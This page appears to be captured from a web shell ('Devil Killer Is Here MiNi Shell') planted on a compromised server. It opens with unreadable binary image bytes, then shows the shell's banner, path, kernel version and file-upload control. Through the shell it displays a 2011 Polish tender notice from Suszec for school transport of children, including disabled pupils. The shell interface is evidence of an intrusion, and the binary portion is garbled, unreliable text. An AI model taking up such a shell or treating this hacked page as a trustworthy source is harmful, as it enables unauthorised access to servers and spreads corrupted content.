JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/419984-N-2011.html

<p class="kh_header"><b>Suszec: Wykonywanie usługi przewozu  dzieci z terenu Gminy Suszec do Szkół Specjalnych w Pszczynie i Czechowicach - Dziedzicach, do Gimnazjum Publicznego w Kryrach i Radostowicach, z Suszca - Branicy do Szkoły Podstawowej w Suszcu i oddziału 0 Przedszkola Publicznego w Suszcu oraz Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego - Żorach
w okresie od 02 stycznia 2012r. do 31 grudnia 2012r.</b><br>
<b>Numer ogłoszenia: 419984 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Oświaty i Sportu w Suszcu , ul. Wyzwolenia 2, 43-267 Suszec, woj. śląskie, tel. 032 2124277, 2124436, faks 032 2124277, 2124436.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gzo.suszec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usługi przewozu  dzieci z terenu Gminy Suszec do Szkół Specjalnych w Pszczynie i Czechowicach - Dziedzicach, do Gimnazjum Publicznego w Kryrach i Radostowicach, z Suszca - Branicy do Szkoły Podstawowej w Suszcu i oddziału 0 Przedszkola Publicznego w Suszcu oraz Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego - Żorach
w okresie od 02 stycznia 2012r. do 31 grudnia 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz  uczniów zamieszkałych na terenie Gminy Suszec (w miejscowościach: Suszec, Kryry, Mizerów, Kobielice, Radostowice, Rudziczka) do Zespołu Szkół Specjalnych Nr 3 w Pszczynie, do Szkoły Podstawowej nr 18 (z oddziałami integracyjnymi) w Pszczynie, Zespołu Szkół Specjalnych Nr 4 w Czechowicach -Dziedzicach, do Gimnazjum Publicznego w Kryrach i Gimnazjum Publicznego w Radostowicach, z Suszca- Branicy do Szkoły Podstawowej w Suszcu i oddziału 0 Przedszkola Publicznego w Suszcu oraz Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Żorach. Dowóz uczniów wykonywany jest w dniach nauki szkolnej zgodnie z organizacją roku szkolnego 2011/2012 i 2012/2013. Przedmiot zamówienia obejmuje 5 zadań: 1)ZADANIE nr 1 Wykonywanie usługi przewozu uczniów niepełnosprawnych, wraz z zapewnieniem opieki, zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty,  z terenu Gminy Suszec do  Zespołu Szkół Specjalnych Nr 3 w Pszczynie, Zespołu Szkół Specjalnych Nr 4 w Czechowicach - Dziedzicach  oraz do Szkoły Podstawowej Nr 18 w Pszczynie ( z oddziałami integracyjnymi)  w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013. Dowóz na godzinę 8:00- 8:30, powrót po skończonych zajęciach ok. godz. 15:20 - 15:30. Dopuszczalne są zmiany godzin dowozu i odwozu uczniów ze względu na organizację zajęć i po uzgodnieniu z Dyrektorami tych szkół. Liczba dowożonych uczniów w roku szk. 2011/2012 a) Zespół Szkół Specjalnych  Nr 3  w Pszczynie - 20 uczniów b)Zespół Szkół Specjalnych Nr 4 w Czechowicach - Dziedzicach  - 1 uczeń c)  Szkoła Podstawowa Nr 18 ( z oddziałami integracyjnymi) w Pszczynie - 2 uczniów RAZEM   23 uczniów. Liczba uczniów dowożonych do w/w  placówek wynika z ilości uczniów do nich  zapisanych lub kontynuujących naukę w danym roku szkolnym. Liczba ta  może też  ulec zmianie począwszy od 1 września 2012r. ( rok szkolny 2012/2013) , w zależności od decyzji i orzeczeń Poradni Psychologiczno- Pedagogicznych o potrzebie kształcenia specjalnego dzieci z terenu Gminy Suszec. Wykaz adresów  dowożonych  dzieci wraz z yszczególnieniem nazwy szkoły i adresu szkoły, do której powinni być dowożeni zawiera Załącznik Nr 2 do niniejszej specyfikacji. Trasa  przewozu obejmuje dowóz i odwóz dzieci z miejsc zamieszkania lub miejsc i przystanków uzgodnionych z rodzicami dzieci  do w/w szkół  specjalnych. Opiekuna (osoba dorosła) na całej trasie przewozu do Zespołu Szkół Specjalnych Nr 3 w Pszczynie oraz do Szkoły Podstawowej nr 18 w Pszczynie (z oddziałami integracyjnymi)    zapewnia  WYKONAWCA.  Natomiast opiekuna dla dziecka dowożonego do Zespołu Szkół Specjalnych nr 4 w Czechowicach - Dziedzicach zapewnia -  ZAMAWIAJĄCY. W przypadku niewykonania kursu pełnego dowozu dziecka  do Zespołu Szkół Specjalnych w Czechowicach- Dziedzicach  z powodu jego nieobecności,  stawka za  1 kurs przewozu zostanie pomniejszona  o 10 % . W przypadku nie wykonania tylko kursu dowozowego lub odwozowego do tej placówki,  stawka ta zostanie pomniejszona o 5%. 2)	ZADANIE nr 2 Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Kryrach. Zadanie to obejmuje dowóz uczniów z Mizerowa  w dniach nauki szkolnej i zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/ 2013, na godzinę 8.00, począwszy od przystanku   Mizerów - Borki, a następnie Mizerów Szkoła, Mizerów PGR -  do Gimnazjum w Kryrach, a następnie odwóz uczniów po zajęciach szkolnych  lub zajęciach pozalekcyjnych w odwrotnej kolejności,  zgodnie z rozkładem zajęć  szkolnych (zajęcia obowiązkowe i dodatkowe zajęcia edukacyjne) w danym roku szkolnym.  Przewidywane są  4 dodatkowe  odwozy uczniów w ciągu tygodnia, w wybranych przez dyrektora dniach,  ze względu na wydłużenie zajęć szkolnych na organizowane  zajęcia dodatkowe i pozalekcyjne. Wtedy liczba uczniów oczekujących  na 2 odwóz w ciągu dnia, będzie mniejsza i uzależniona od rodzaju zajęć i uczestniczących w nich uczniów. W okresie od września do listopada i od grudnia do marca danego roku liczba dowożonych uczniów może ulec zmianie ze względu na dojazdy uczniów własnymi środkami komunikacji. Informację w tej sprawie udzieli Dyrektor GP Kryry.szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Gimnazjum w Kryrach na 5 dni przed datą rozpoczęcia dowozu. Ilość dzieci przewidzianych do przewozu: a) w  roku szkolnym 2011/2012 - 60  uczniów b) w roku szkolnym 2012/2013 - 58 uczniów. Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2. Opiekuna (osoba dorosła) w czasie dowożenia na całej trasie dowozu i odwozu  zapewnia WYKONAWCA. 3)  ZADANIE nr 3. Wykonywanie usługi przewozu  uczniów do Gimnazjum Publicznego w Radostowicach. Zadanie to obejmuje dowóz  uczniów z Kobielic w dniach nauki szkolnej, zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/2013, na godzinę 8:00, począwszy od przystanku Kobielice - Szkoła, a następnie przystanek Kobielice - Kościół,  Kobielice - MEDROS  i dalej do Gimnazjum w Radostowicach (parking przy kościele). Odwozy  po zajęciach szkolnych będą się odbywały w odwrotnej kolejności,  zgodnie z rozkładem zajęć  szkolnych ( zajęcia obowiązkowe i dodatkowe zajęcia edukacyjne)  w danym roku szkolnym). Przewidywane są  4 dodatkowe  odwozy uczniów w ciągu tygodnia, w wybranych przez dyrektora dniach,  ze względu na wydłużenie zajęć szkolnych na organizowane  zajęcia dodatkowe i pozalekcyjne. Wtedy liczba uczniów oczekujących  na 2 odwóz w ciągu dnia, będzie mniejsza i uzależniona od rodzaju zajęć i uczestniczących w nich uczniów. W okresie od września do listopada i od grudnia do marca danego roku liczba dowożonych uczniów może ulec zmianie ze względu na dojazdy uczniów własnymi środkami komunikacji. Informację w tej sprawie udzieli Dyrektor GP Radostowice. Szczegółowy rozkład zajęć szkolnych przedstawi Dyrektor Gimnazjum w Radostowicach  na 5 dni przed datą rozpoczęcia dowozu.  Ilość dzieci przewidzianych do przewozu: a) w roku szkolnym 2011/2012 - 36  uczniów b) w roku szkolnym 2012/ 2013 - 48 uczniów.Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2. Opiekuna (osoba dorosła) w czasie dowożenia na całej trasie dowozu i odwozu  zapewnia WYKONAWCA. 4) ZADANIE nr 4 Zadanie to obejmuje wykonywanie usługi przewozu uczniów z  Suszca - Branicy  do Szkoły Podstawowej w Suszcu oraz dzieci oddziału 0 z Suszca - Branicy do Przedszkola Publicznego w Suszcu. Liczba przewożonych uczniów: a) w roku  szkolnym 2011/2012 - 7 uczniów do Szkoły Podstawowej w Suszcu, - 2 dzieci do oddziału 0 Przedszkola Publicznego w Suszcu b) w roku szkolnym 2012/2013 - 7 uczniów do Szkoły Podstawowej w Suszcu. w roku szkolnym 2012/2013 - 2 dzieci do oddziału 0 Przedszkola Publicznego w Suszcu. Wykaz przystanków dowożonych uczniów oraz miejsc ich wsiadania i wysiadania zawiera Załącznik Nr 2.Wykonawca zapewnia opiekuna (osoba dorosła) dowożonych uczniów  na całej trasie przewozu. Trasa przewozu obejmuje: Przewóz  dzieci  z miejsc zamieszkania lub miejsca ustalonego z rodzicami dzieci ( przystanek na skrzyżowaniu z ul. Pszczyńską  w Suszcu - Branicy) i przewiezienie ich do Szkoły Podstawowej w Suszcu i Przedszkola w Suszcu na godz. 8:00 i  odwóz dzieci po zajęciach szkolnych i przedszkolnych w każdym dniu nauki szkolnej i  zgodnie z organizacją roku szkolnego 2011/2012 i roku szkolnego 2012/2013 w placówkach feryjnych i nie feryjnych,  tj od 2 stycznia 2012  do 31 grudnia 2012 r. 
Informację o szczegółowych  godzinach  zakończenia zajęć w szkole i przedszkolu w poszczególnych dniach nauki szkolnej uzyskać można u dyrektora Szkoły Podstawowej w Suszcu i Przedszkola w Suszcu. 5)  ZADANIE nr 5 Zadanie to obejmuje wykonywanie usługi przewozu uczniów niepełnosprawnych z Gminy Suszec do Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Żorach, wraz z zapewnieniem opieki,  zgodnie z art. 17 ust. 3a i art. 14a ust. 4 ustawy z dnia 7 września 1991 r.  o systemie oświaty, w dniach nauki szkolnej zgodnie z organizacją roku szk. 2011/2012 i roku szk. 2012/2013. Liczba ta  może też  ulec zmianie począwszy od 1 września 2012r. (rok szkolny 2012/2013) , w zależności od decyzji i orzeczeń Poradni Psychologiczno - Pedagogicznych o potrzebie kształcenia specjalnego dzieci z terenu Gminy Suszec. Trasa  przewozu obejmuje dowóz i odwóz dzieci z miejsc zamieszkania lub miejsc i przystanków uzgodnionych z rodzicami dzieci  do w/w ośrodka. Dowóz do placówki od poniedziałku do piątku na godzinę 8 oo, powrót po zakończonych zajęciach około godz. 15 oo. Wykaz adresów dzieci (miejsc zamieszkania) zawiera Załącznik  Nr 2 do SIWZ.Opiekuna (osoba dorosła) na całej trasie przewozu zapewnia WYKONAWCA. Liczba przewożonych dzieci w roku szkolnym 2011/2012 wynosi 4. Liczba przewożonych dzieci w roku szkolnym 2012/2013 zostanie ustalona do dnia 31.08.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania uprawnień do wykonywania określonej działalności zamawiający uzna posiadanie aktualnej licencji na wykonywanie krajowego transportu drogowego przewozu osób lub aktualnego zaświadczenia na wykonywanie przewozu osób (chyba że licencja nie jest wymagana zgodnie z ustawą o transporcie drogowym. W tym przypadku należy dołączyć oświadczenie - Załącznik nr 13)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku posiadania wiedzy i doświadczenia, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, minimum 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu należy dołączyć dokumenty potwierdzające, że wymienione usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 8</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim potencjałem technicznym Zamawiający uzna posiadanie przez Wykonawcę sprzętu transportowego przeznaczonego do przewozu osób lub Wykonawca przedstawi pisemne zobowiązania innych podmiotów do udostępnienia sprzętu transportowego na wykonanie zamówienia publicznego. Posiadany sprzęt transportowy należy przedstawić w Załączniku nr 5. Wymogi techniczne oraz zakres niezbędnego wyposażenia i oznaczenia, określa Rozporządzenie Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2003r. Nr 32, poz. 262 ze zm.). Liczba miejsc musi przewyższać liczbę dowożonych uczniów oraz musi zapewniać miejsca siedzące dla opiekuna. Pojazdy powinny być oznaczone i przystosowane zgodnie z przepisami o ruchu drogowym i wymogami MEN ( gimbusy) Wykonawca powinien przedstawić sprzęt do przewozu osób, dostosowany do przewozu osób zgodnie z w/w przepisami - wymagane minimum 2 pojazdy na każde zadanie ( busy, autobusy), o liczbie miejsc przekraczających ilość uczniów do przewozu, wraz z opiekunami na dane zadanie. Sprzęt do przewozu powinien być sprawny technicznie i posiadać aktualne badania techniczne oraz posiadać ubezpieczenie OC i NW.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Załącznik nr 11</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunków dotyczących sytuacji ekonomicznej i finansowej zamawiający uzna złożenie oświadczenia z art. 22 ust. 1 ustawy Pzp - Załącznik nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany treści umowy na podstawie art. 144 ustawy o zamówieniach publicznych, jednak w sytuacji łącznego spełnienia 2 przesłanek: a) gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 357 KC. b) zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy, np.: a) zmiana adresu/siedziby/konta/firmy Zamawiającego/Wykonawcy, b zmiana osób występujących po stronie Zamawiającego/Wykonawcy, c) zmiana będąca skutkiem poprawy oczywistej omyłki, e) zmiana wysokości wynagrodzenia w przypadku zmiany ceny w okresie obowiązywania umowy, opisanej w punkcie 13, podpunkt 4 SIWZ. f) zmiana ilości kursów, wynikająca ze zmiany ilości przewożonych dzieci.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gzo.suszec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Oświaty i Sportu w Suszcu, ul. Wyzwolenia 2, 43-267 Suszec, woj. śląskie.</p>
